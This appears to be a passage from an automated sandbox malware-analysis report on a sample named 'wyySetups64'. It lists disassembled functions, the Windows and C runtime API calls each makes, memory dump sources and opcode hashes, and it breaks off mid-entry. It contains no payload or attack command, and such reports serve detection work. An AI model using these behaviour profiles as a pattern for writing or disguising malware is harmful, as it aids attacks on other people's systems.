                                                                                                                                                                                                              • Instruction Fuzzy Hash: A111D7B1C00209DFDB00EFA4D945AAE7BF0FF08314F1485A9F858AB252DB389A559F50
                                                                                                                                                                                                              Function 03372D30 Relevance: 7.5, APIs: 5, Instructions: 36COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 03372D5C
                                                                                                                                                                                                              • CancelIo.KERNEL32(?), ref: 03372D66
                                                                                                                                                                                                              • InterlockedExchange.KERNEL32(00000000,00000000), ref: 03372D6F
                                                                                                                                                                                                              • closesocket.WS2_32(?), ref: 03372D79
                                                                                                                                                                                                              • SetEvent.KERNEL32(00000001), ref: 03372D83
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CancelEventExchangeInterlockedclosesocketsetsockopt
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1486965892-0
                                                                                                                                                                                                              • Opcode ID: ba676cb59a6543ba68ca56fb16bb5344c56a3d7a7e837ec16107930ac6f7a10f
                                                                                                                                                                                                              • Instruction ID: a2e6d8aaa8899fb2c9f5fb13ea23818941e328889f11a039bbae89d595db7860
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ba676cb59a6543ba68ca56fb16bb5344c56a3d7a7e837ec16107930ac6f7a10f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4BF03C76100B08FBD234AF54DD89F6777BCFB49B11F100A1DF696D6684C6B5B5088BA0
                                                                                                                                                                                                              Function 00BDE13F Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 00BDE14B
                                                                                                                                                                                                                • Part of subcall function 00BD990F: __getptd_noexit.LIBCMT ref: 00BD9912
                                                                                                                                                                                                                • Part of subcall function 00BD990F: __amsg_exit.LIBCMT ref: 00BD991F
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 00BDE162
                                                                                                                                                                                                              • __amsg_exit.LIBCMT ref: 00BDE170
                                                                                                                                                                                                              • __lock.LIBCMT ref: 00BDE180
                                                                                                                                                                                                              • __updatetlocinfoEx_nolock.LIBCMT ref: 00BDE194
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 938513278-0
                                                                                                                                                                                                              • Opcode ID: aeacecc2d4bc766ab969d51d959cac02458c5a14ac40567c9b1395467646c10f
                                                                                                                                                                                                              • Instruction ID: 81318539126f4d389007404bd3037b0c2253b06ec081ca36cb10d5bfc900def8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: aeacecc2d4bc766ab969d51d959cac02458c5a14ac40567c9b1395467646c10f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E1F06D32A446209BE721BBA8980375DB2E0AF00B20F1481DBF5647F3D2EF748901CA55
                                                                                                                                                                                                              Function 03385006 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 03385012
                                                                                                                                                                                                                • Part of subcall function 03383E5B: __getptd_noexit.LIBCMT ref: 03383E5E
                                                                                                                                                                                                                • Part of subcall function 03383E5B: __amsg_exit.LIBCMT ref: 03383E6B
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 03385029
                                                                                                                                                                                                              • __amsg_exit.LIBCMT ref: 03385037
                                                                                                                                                                                                              • __lock.LIBCMT ref: 03385047
                                                                                                                                                                                                              • __updatetlocinfoEx_nolock.LIBCMT ref: 0338505B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 938513278-0
                                                                                                                                                                                                              • Opcode ID: 8fec391927bf72aa658254b36fa26631926a950090b611162a4361cce9eb1b79
                                                                                                                                                                                                              • Instruction ID: 771267a818e9edcbfe7faefd50dfdad87135e071a235b3b89c88d5afe9e722f3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8fec391927bf72aa658254b36fa26631926a950090b611162a4361cce9eb1b79
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 47F0B43AD05701DBF760FB68A8C2B8D73A4AF01B25F14424DD5556F2D0CB7855418A96
                                                                                                                                                                                                              Function 032049C5 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 032049D1
                                                                                                                                                                                                                • Part of subcall function 0320381A: __getptd_noexit.LIBCMT ref: 0320381D
                                                                                                                                                                                                                • Part of subcall function 0320381A: __amsg_exit.LIBCMT ref: 0320382A
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 032049E8
                                                                                                                                                                                                              • __amsg_exit.LIBCMT ref: 032049F6
                                                                                                                                                                                                              • __lock.LIBCMT ref: 03204A06
                                                                                                                                                                                                              • __updatetlocinfoEx_nolock.LIBCMT ref: 03204A1A
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4119630030.00000000031F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031F0000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_31f0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 938513278-0
                                                                                                                                                                                                              • Opcode ID: b8df328af2ca13b15628588c2ddeec9715aad909c858093188abaa4f1f59b7b1
                                                                                                                                                                                                              • Instruction ID: 67858a27ff262d3ba124acdfd74db23f6c8ea10c829880244c91bd8e5399485e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b8df328af2ca13b15628588c2ddeec9715aad909c858093188abaa4f1f59b7b1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C5F0243A925314CAE724FB699801B4E33A0AF04720F14C24CD744AF2D3CFB418C9CE49
                                                                                                                                                                                                              Function 00B2E116 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 00B2E122
                                                                                                                                                                                                                • Part of subcall function 00B298E6: __getptd_noexit.LIBCMT ref: 00B298E9
                                                                                                                                                                                                                • Part of subcall function 00B298E6: __amsg_exit.LIBCMT ref: 00B298F6
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 00B2E139
                                                                                                                                                                                                              • __amsg_exit.LIBCMT ref: 00B2E147
                                                                                                                                                                                                              • __lock.LIBCMT ref: 00B2E157
                                                                                                                                                                                                              • __updatetlocinfoEx_nolock.LIBCMT ref: 00B2E16B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116355062.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_b20000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 938513278-0
                                                                                                                                                                                                              • Opcode ID: ae27d4fbf31c29595a38e1aa150fd8cf220abffb4ca541ac361fbea8b80d16f3
                                                                                                                                                                                                              • Instruction ID: d7603fe8b7a46f16d9b6167b6a4f8e1de1369a1bc1b3443aa90ce81e071e0df8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ae27d4fbf31c29595a38e1aa150fd8cf220abffb4ca541ac361fbea8b80d16f3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E0F090329046309BEB21FBA9B80375D32E0AF00761F1841D9F56C7B2D3CB74D851DA56
                                                                                                                                                                                                              Function 0337C910 Relevance: 7.5, APIs: 5, Instructions: 33processCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,000001FE), ref: 0337C932
                                                                                                                                                                                                              • GetCommandLineW.KERNEL32 ref: 0337C938
                                                                                                                                                                                                              • GetStartupInfoW.KERNEL32(?), ref: 0337C947
                                                                                                                                                                                                              • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000020,00000000,00000000,?,?), ref: 0337C96F
                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 0337C977
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Process$CommandCreateExitFileInfoLineModuleNameStartup
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3421218197-0
                                                                                                                                                                                                              • Opcode ID: 6e4e98850fd934e19492cb9f06c813e7be2ae75dfd8f179e6acbd9dbed3b93e2
                                                                                                                                                                                                              • Instruction ID: 126680ff90e3ba4a21bc5299759fb75e863b18f95845a4e5e560ddf1f74a66fc
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6e4e98850fd934e19492cb9f06c813e7be2ae75dfd8f179e6acbd9dbed3b93e2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AAF06D3158431CFBEB20ABA0DC8DFEB777CEB04B00F100695B619EA0D4DA716A44CB54
                                                                                                                                                                                                              Function 033775B0 Relevance: 7.5, APIs: 5, Instructions: 33processCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,000001FE), ref: 033775D2
                                                                                                                                                                                                              • GetCommandLineW.KERNEL32 ref: 033775D8
                                                                                                                                                                                                              • GetStartupInfoW.KERNEL32(?), ref: 033775E7
                                                                                                                                                                                                              • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000020,00000000,00000000,?,?), ref: 0337760F
                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 03377617
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Process$CommandCreateExitFileInfoLineModuleNameStartup
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3421218197-0
                                                                                                                                                                                                              • Opcode ID: c393eda97510eb12d2f30ab71bbdf1a551510e076f91c0e53bfbc25742ccd659
                                                                                                                                                                                                              • Instruction ID: 7c9f38c6c582d54bcc7714c277582e79e6b9d561521a3d8719f83bdd4ff6d125
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c393eda97510eb12d2f30ab71bbdf1a551510e076f91c0e53bfbc25742ccd659
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 16F0907158531DFBE720ABA0DC8DFEA777CEB04B00F100695B619EA0C4D6716A44CB54
                                                                                                                                                                                                              Function 00BD71AA Relevance: 7.5, APIs: 5, Instructions: 24threadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00BD82F0: _doexit.LIBCMT ref: 00BD82FC
                                                                                                                                                                                                              • ___set_flsgetvalue.LIBCMT ref: 00BD71BC
                                                                                                                                                                                                                • Part of subcall function 00BD9754: TlsGetValue.KERNEL32(00000000,00BD98AD,?,00BD9FB0,00000000,00000001,00000000,?,00BDC0CF,00000018,00BE7C70,0000000C,00BDC15F,00000000,00000000), ref: 00BD975D
                                                                                                                                                                                                                • Part of subcall function 00BD9754: DecodePointer.KERNEL32(?,00BD9FB0,00000000,00000001,00000000,?,00BDC0CF,00000018,00BE7C70,0000000C,00BDC15F,00000000,00000000,?,00BD99BA,0000000D), ref: 00BD976F
                                                                                                                                                                                                                • Part of subcall function 00BD9754: TlsSetValue.KERNEL32(00000000,?,00BD9FB0,00000000,00000001,00000000,?,00BDC0CF,00000018,00BE7C70,0000000C,00BDC15F,00000000,00000000,?,00BD99BA), ref: 00BD977E
                                                                                                                                                                                                              • ___fls_getvalue@4.LIBCMT ref: 00BD71C7
                                                                                                                                                                                                                • Part of subcall function 00BD9734: TlsGetValue.KERNEL32(?,?,00BD71CC,00000000), ref: 00BD9742
                                                                                                                                                                                                              • ___fls_setvalue@8.LIBCMT ref: 00BD71DA
                                                                                                                                                                                                                • Part of subcall function 00BD9788: DecodePointer.KERNEL32(?,?,?,00BD71DF,00000000,?,00000000), ref: 00BD9799
                                                                                                                                                                                                              • GetLastError.KERNEL32(00000000,?,00000000), ref: 00BD71E3
                                                                                                                                                                                                              • ExitThread.KERNEL32 ref: 00BD71EA
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00BD71F0
                                                                                                                                                                                                              • __freefls@4.LIBCMT ref: 00BD7210
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 781180411-0
                                                                                                                                                                                                              • Opcode ID: 93a54f288456e49b4520536564fa631ed42b5905714dc7c49ec03ff63d776f0c
                                                                                                                                                                                                              • Instruction ID: c0e9f263b0d3d614b41fe37277ee6b4403125670ffd5ef22aa018926f4b7d49a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 93a54f288456e49b4520536564fa631ed42b5905714dc7c49ec03ff63d776f0c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F2E0463691564A6B8F103BB18D4E8DEFAED9D41358F000882FA20A7202FF289C0186A2
                                                                                                                                                                                                              Function 0337F9B8 Relevance: 7.5, APIs: 5, Instructions: 24threadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 03381CD0: _doexit.LIBCMT ref: 03381CDC
                                                                                                                                                                                                              • ___set_flsgetvalue.LIBCMT ref: 0337F9CA
                                                                                                                                                                                                                • Part of subcall function 03383CA0: TlsGetValue.KERNEL32(00000000,03383DF9,?,03384500,00000000,00000001,00000000,?,03388DE6,00000018,03396448,0000000C,03388E76,00000000,00000000), ref: 03383CA9
                                                                                                                                                                                                                • Part of subcall function 03383CA0: DecodePointer.KERNEL32(?,03384500,00000000,00000001,00000000,?,03388DE6,00000018,03396448,0000000C,03388E76,00000000,00000000,?,03383F06,0000000D), ref: 03383CBB
                                                                                                                                                                                                                • Part of subcall function 03383CA0: TlsSetValue.KERNEL32(00000000,?,03384500,00000000,00000001,00000000,?,03388DE6,00000018,03396448,0000000C,03388E76,00000000,00000000,?,03383F06), ref: 03383CCA
                                                                                                                                                                                                              • ___fls_getvalue@4.LIBCMT ref: 0337F9D5
                                                                                                                                                                                                                • Part of subcall function 03383C80: TlsGetValue.KERNEL32(?,?,0337F9DA,00000000), ref: 03383C8E
                                                                                                                                                                                                              • ___fls_setvalue@8.LIBCMT ref: 0337F9E8
                                                                                                                                                                                                                • Part of subcall function 03383CD4: DecodePointer.KERNEL32(?,?,?,0337F9ED,00000000,?,00000000), ref: 03383CE5
                                                                                                                                                                                                              • GetLastError.KERNEL32(00000000,?,00000000), ref: 0337F9F1
                                                                                                                                                                                                              • ExitThread.KERNEL32 ref: 0337F9F8
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 0337F9FE
                                                                                                                                                                                                              • __freefls@4.LIBCMT ref: 0337FA1E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 781180411-0
                                                                                                                                                                                                              • Opcode ID: 8f7b0990ddae8462c3fb30c1e045ad7ceb689a100241d2bd4c9ab7cef22a5082
                                                                                                                                                                                                              • Instruction ID: 9c4c06f56a41e10fe3fa5a820fef2ba706a750521fbbd7dab71bdac5b9e6d5d2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8f7b0990ddae8462c3fb30c1e045ad7ceb689a100241d2bd4c9ab7cef22a5082
                                                                                                                                                                                                              • Instruction Fuzzy Hash: ECE0BF7DE00719B7CB50B7B19D8985F7A7CAD016A1F150450EE15DB200EA29D51187A6
                                                                                                                                                                                                              Function 03379430 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 100COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 0337944A
                                                                                                                                                                                                                • Part of subcall function 0337EF86: std::exception::exception.LIBCMT ref: 0337EF9B
                                                                                                                                                                                                                • Part of subcall function 0337EF86: __CxxThrowException@8.LIBCMT ref: 0337EFB0
                                                                                                                                                                                                                • Part of subcall function 0337EF86: std::exception::exception.LIBCMT ref: 0337EFC1
                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 03379482
                                                                                                                                                                                                                • Part of subcall function 0337EF39: std::exception::exception.LIBCMT ref: 0337EF4E
                                                                                                                                                                                                                • Part of subcall function 0337EF39: __CxxThrowException@8.LIBCMT ref: 0337EF63
                                                                                                                                                                                                                • Part of subcall function 0337EF39: std::exception::exception.LIBCMT ref: 0337EF74
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                                                                                                                                                                                              • String ID: invalid string position$string too long
                                                                                                                                                                                                              • API String ID: 1823113695-4289949731
                                                                                                                                                                                                              • Opcode ID: 2fad3911d20800043290ee8f6863df2922e069065c1805be8387bf179f35747c
                                                                                                                                                                                                              • Instruction ID: e6fc1ab60938138aaba70af3ec9900e407ca8be717d1e4fddd7b9f854e1d44d6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2fad3911d20800043290ee8f6863df2922e069065c1805be8387bf179f35747c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5A21A5377102149BD731EE6CECC0B5AF7E9EB91664B250B6FE192CB640D765D880C3A1
                                                                                                                                                                                                              Function 033784B0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 69COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 033784C9
                                                                                                                                                                                                                • Part of subcall function 0337EF86: std::exception::exception.LIBCMT ref: 0337EF9B
                                                                                                                                                                                                                • Part of subcall function 0337EF86: __CxxThrowException@8.LIBCMT ref: 0337EFB0
                                                                                                                                                                                                                • Part of subcall function 0337EF86: std::exception::exception.LIBCMT ref: 0337EFC1
                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 033784E7
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                                                                                                                                                                                              • String ID: invalid string position$string too long
                                                                                                                                                                                                              • API String ID: 963545896-4289949731
                                                                                                                                                                                                              • Opcode ID: 6959d8dc4fea10eca9eb703421664e0019c726d12cc3cd81bb05ebdc822548ee
                                                                                                                                                                                                              • Instruction ID: 4eafed6401a4fc43a97b7e44ceb50cfde45c9276df32217ffbeca20eac9c3adb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6959d8dc4fea10eca9eb703421664e0019c726d12cc3cd81bb05ebdc822548ee
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8A21A235B10306DF8B24DF6CE8C5C59B3AABF88364714466AF516CF641E734EA54C790
                                                                                                                                                                                                              Function 00B33A27 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 42COMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ___BuildCatchObject.LIBCMT ref: 00B33A3A
                                                                                                                                                                                                                • Part of subcall function 00B33995: ___BuildCatchObjectHelper.LIBCMT ref: 00B339CB
                                                                                                                                                                                                              • _UnwindNestedFrames.LIBCMT ref: 00B33A51
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116355062.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_b20000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: BuildCatchObject$FramesHelperNestedUnwind
                                                                                                                                                                                                              • String ID: csm$csm
                                                                                                                                                                                                              • API String ID: 3487967840-3733052814
                                                                                                                                                                                                              • Opcode ID: 5a0efde82555800522ebcbcdf0ebfc514e59fc27468206ba67c06b53666bf625
                                                                                                                                                                                                              • Instruction ID: 6440370d195759820379d8f677f9af03d51fa9fbd4961ba21259bb462cc83b15
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5a0efde82555800522ebcbcdf0ebfc514e59fc27468206ba67c06b53666bf625
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4201F63100010ABBDF12AF51CC46EAF7FEAEF08754F208050BD5815261D772DAB1DBA1
                                                                                                                                                                                                              Function 0337D830 Relevance: 6.4, APIs: 5, Instructions: 140COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsBadReadPtr.KERNEL32(?,00000014), ref: 0337D868
                                                                                                                                                                                                              • IsBadReadPtr.KERNEL32(?,00000014), ref: 0337D938
                                                                                                                                                                                                              • SetLastError.KERNEL32(0000007F), ref: 0337D963
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Read$ErrorLast
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2715074504-0
                                                                                                                                                                                                              • Opcode ID: dff8af81e28bf994cf2aaa14f85205c58263fb693875d23e24dfa06cd5512e87
                                                                                                                                                                                                              • Instruction ID: 6eb8ce23033999347ad14a75a03069ab01e88767bb2684ea4317c000a2d5a077
                                                                                                                                                                                                              • Opcode Fuzzy Hash: dff8af81e28bf994cf2aaa14f85205c58263fb693875d23e24dfa06cd5512e87
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 18418971A0060AABDB20DF99DCC0B6AF3F9FF88314F188599E8599B350D775E901CB90
                                                                                                                                                                                                              Function 032039D3 Relevance: 6.1, APIs: 4, Instructions: 109COMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4119630030.00000000031F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031F0000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_31f0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __calloc_crt__init_pointers__mtterm
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2478854527-0
                                                                                                                                                                                                              • Opcode ID: 76c9643fd1df18821398edaab6323fbd9f0414cbbe87c74b2baaec3723e64a7d
                                                                                                                                                                                                              • Instruction ID: 71eff737a15e9eaf114be0757d90cd394d3e9ef591ade109f61b039cedde410c
